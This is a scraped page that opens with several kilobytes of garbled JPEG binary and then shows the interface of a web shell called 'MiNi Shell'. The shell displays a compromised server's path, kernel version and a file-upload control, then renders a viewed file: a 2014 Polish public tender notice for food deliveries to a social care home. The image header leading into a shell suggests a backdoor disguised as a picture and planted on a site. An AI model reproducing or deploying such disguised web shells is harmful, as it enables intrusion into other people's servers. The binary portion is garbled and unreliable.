JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141127/389466-N-2014.html

<p class="kh_header"><b>Przytoczna: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH NA 2015 ROK</b><br>
<b>Numer ogłoszenia: 389466 - 2014; data zamieszczenia: 27.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Rokitno 58, 66-340 Przytoczna, woj. lubuskie, tel. 0-95 7493024, 7494032, faks 0-95 7493024.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> miedzyrzecz.dps5.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH NA 2015 ROK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A  - żywność, napoje i art. mleczarskie 
1.	Ogórek konserwowy - 0,9 l	szt.	360
2.	Koncentrat pomidorowy - 0,9 kg	szt.	170
3.	Groch - 1 kg	kg	100
4.	Groszek konserwowy - 400 g	szt.	200
5.	Fasola - 1 kg	kg	110
6.	Fasolka konserwowa - 700 g	szt.	60
7.	Marchew konserwowa - 700 g	szt.	200
8.	Ćwikła - 280 g	szt.	200
9.	Ketchup - 500 g	szt.	100
10.	Majonez - 700 g	szt.	120
11.	Musztarda - 200 g	szt.	250
12.	Kapusta konserwowa czerwona - 0,9 l	szt.	300
13.	Sałatka wielowarzywna - 0,9 l	szt.	350
14.	Koncentrat szczawiowy - 300 g	szt.	60
15.	Ogórek kwaszony - 5 kg	kg	260
16.	Kapusta kwaszona - 5 kg	kg	250
17.	Pasztet drobiowy - 500 g	szt.	400
18.	Konserwa mięsna - 300 g	szt.	280
19.	Konserwa rybna - 170 g	szt.	800
20.	Paprykarz szczeciński - 300 g	szt.	500
21.	Cukier - 1 kg	kg	1600
22.	Kasz jęczmięnna - 1 kg	kg	180
23.	Kasza manna - 1,0 kg	kg	150
24.	Ryż - 1 kg	kg	550
25.	Płatki owsiane - 0,5 kg	kg	120
26.	Płatki kukurydziane - 250 g	szt.	300
27.	Mąka wrocławska - 1 kg	kg	750
28.	Mąka ziemniaczana - 1 kg	kg	20
29.	Olej - 1 l	l	450
30.	Żurek - 1 kg	kg	50
31	Sól - 1 kg	kg	400
32	Makaron  -  nitki/świderki- ilość w kg 	kg	200/500
33	Bułka tarta - 0,5 kg	kg	230
34	Galaretka owocowa - 90 g	szt	1500
35	Kisiel - 40 g	szt	1500
36	Budyń - 40 g	szt.	150
37	Kompoty - 0,9 l	szt.	160
38	Kawa Inka - 150 g	szt	900
39	Herbata - 100 g	kg	50
40	Ocet - 0,5 l	szt.	120
41	Pieprz naturalny mielony 20 g	szt	600
42	Pieprz ziołowy - 15 g	szt	330
43	Przyprawa do zup w płynie - 1 l	l	75
44	Majeranek 15 g	szt	350
45.	Zaprawa do napojów, różne smaki - 0,5 litra	szt	540
46.	Przyprawa do zup w proszku - 0,2 kg	szt	380
47.	Papryka słodka mielona - 20 g	szt	300
48.	Czosnek mielony - 20 g	szt	250
49.	Kakao - 100 g	szt	550
50.	Herbata owocowa ekspresowa - 2 g x 20 szt.	szt	800
51.	Sos pieczeniowy - 30 g	szt	360
52.	Zupa ogonowa - 1 kg	kg	50
53.	Rosół z kury - 170 g	szt	130
54.	Zupa pieczarkowa - 1 kg	kg	40
55.	kukurydza konserwowa - 400 g	szt.	180
56.	Miód naturalny - 370g	szt	20
57.	Cynamon - 20g	szt	50
58.	Kwasek cytrynowy - 20 g	szt	50
59.	Chrzan - 280 g	szt	190
60.	Liść laurowy - 10 g	szt	60
  61.	Ser tylżycki twardy	kg	280
62.	Ser topiony	kg	200
63.	Mleko w proszku pełnotłuste 	kg	1200
64.	Masło extra nie mniej  niż 82 % tłuszczu	kg	900
65.	Margaryna - 0,25 kg	kg	100
66.	Masło roślinne - 0,5 kg	kg	130
67.	Śmietana 18% - 0,5 l	l	650
  68.	Twaróg półtłusty - ilość w kg	kg	330
69.	Jogurt owocowy - 125 g	szt.	4500
70	Kefir naturalny - 400 g	szt.	380
71	Cukier waniliowy- 30 g	szt.	80
72	Proszek do pieczenia - 40 g	szt.	50
73	Cukier puder - 500 g	szt.	15
74	Dżem  / różne smaki /- 280 g	szt.	380

Część B  - mięso, wędliny, drób 
1.		Karkówka wieprzowa bez kości	kg	350
2.		Schab wieprzowy bez kości	kg	300 
3.		Schab wieprzowy z kością	kg	400
4.		Mięso mielone wieprzowe	kg	230
5.		Mięso gulaszowe wieprzowe	kg	400
6.		Kiełbasa mortadela	kg	80
7.		Kiełbasa biała parzona	kg	100
8.		Kiełbasa Piwna 	kg	30
9.		Kiełbasa szynkowa	kg	30
10.		Kiełbasa żywiecka	kg	50
11.		Kiełbasa zwyczajna	kg	300
12.		Kiełbasa śląska	kg	230
13.		Kiełbasa parówkowa	kg	280
14.		Wątrobianka	kg	70
15.		Salceson biały	kg	150
16.		Metka cebulowa	kg	150
17.		Łopatka faszerowana	kg	150
18.		Kaszanka	kg	180
19.		Pieczeń rzymska	kg	170
20.		Boczek faszerowany	kg	180
21.		Żeberka wieprzowe	kg	240
22.		Szynka gotowana wędzona	kg	90
23.		Smalec -0,2 kg	kg	80
      24. 	Boczek wędzony parzony	kg	30 
25.	Kurczak świeży	kg	200
26.	Udko z kurczaka	kg	400
27.	Porcje rosołowe	kg	600
      28.	Wątróbka drobiowa	kg	180
         29.	Kiełbasa tyrolska	kg	30
30.	Polędwica sopocka	kg	20
31.	Kiełbasa mielonka	kg	30

Część C - pieczywo 
1	Chleb baltonowski - 1 kg	szt.	7.500 szt.
2	Chleb razowy - 1 kg	szt.	1.300 szt. 
3	Bułka wrocławska - 0,10 kg	szt.	19.300 szt.

Część D - ryby i mrożonki
1	Śledź matyjas	kg	260
2	Makrela wędzona	kg	200
3	Filety z PANGI     - mrożony                	kg	460
4	Burger rybny z warzywami - mrożone	kg	180
5	Pierogi z mięsem - mrożone	kg	120
6	Pierogi ruskie  - mrożone    	kg	120
7	Flaki wieprzowe - mrożone	kg	260
8	Zupa wiosenna - mrożona	kg	140
9	Włoszczyzna paski - mrożona	kg	760.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.81.00.00-9, 15.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie / spełnia - nie spełnia /</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie / spełnia - nie spełnia /</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie / spełnia - nie spełnia /</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie / spełnia - nie spełnia /</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie / spełnia - nie spełnia /</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miedzyrzecz.dps5.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
	Rokitno Nr 58   66 - 340 Przytoczna  
	tel. / fax 095 / 7493024 lub 095/7943032.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2014 godzina 10:00, miejsce: Sekretariat Domu Pomocy Społecznej
	Rokitno Nr 58   66 - 340 Przytoczna  
	tel. / fax 095 / 7493024 lub 095/7943032.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com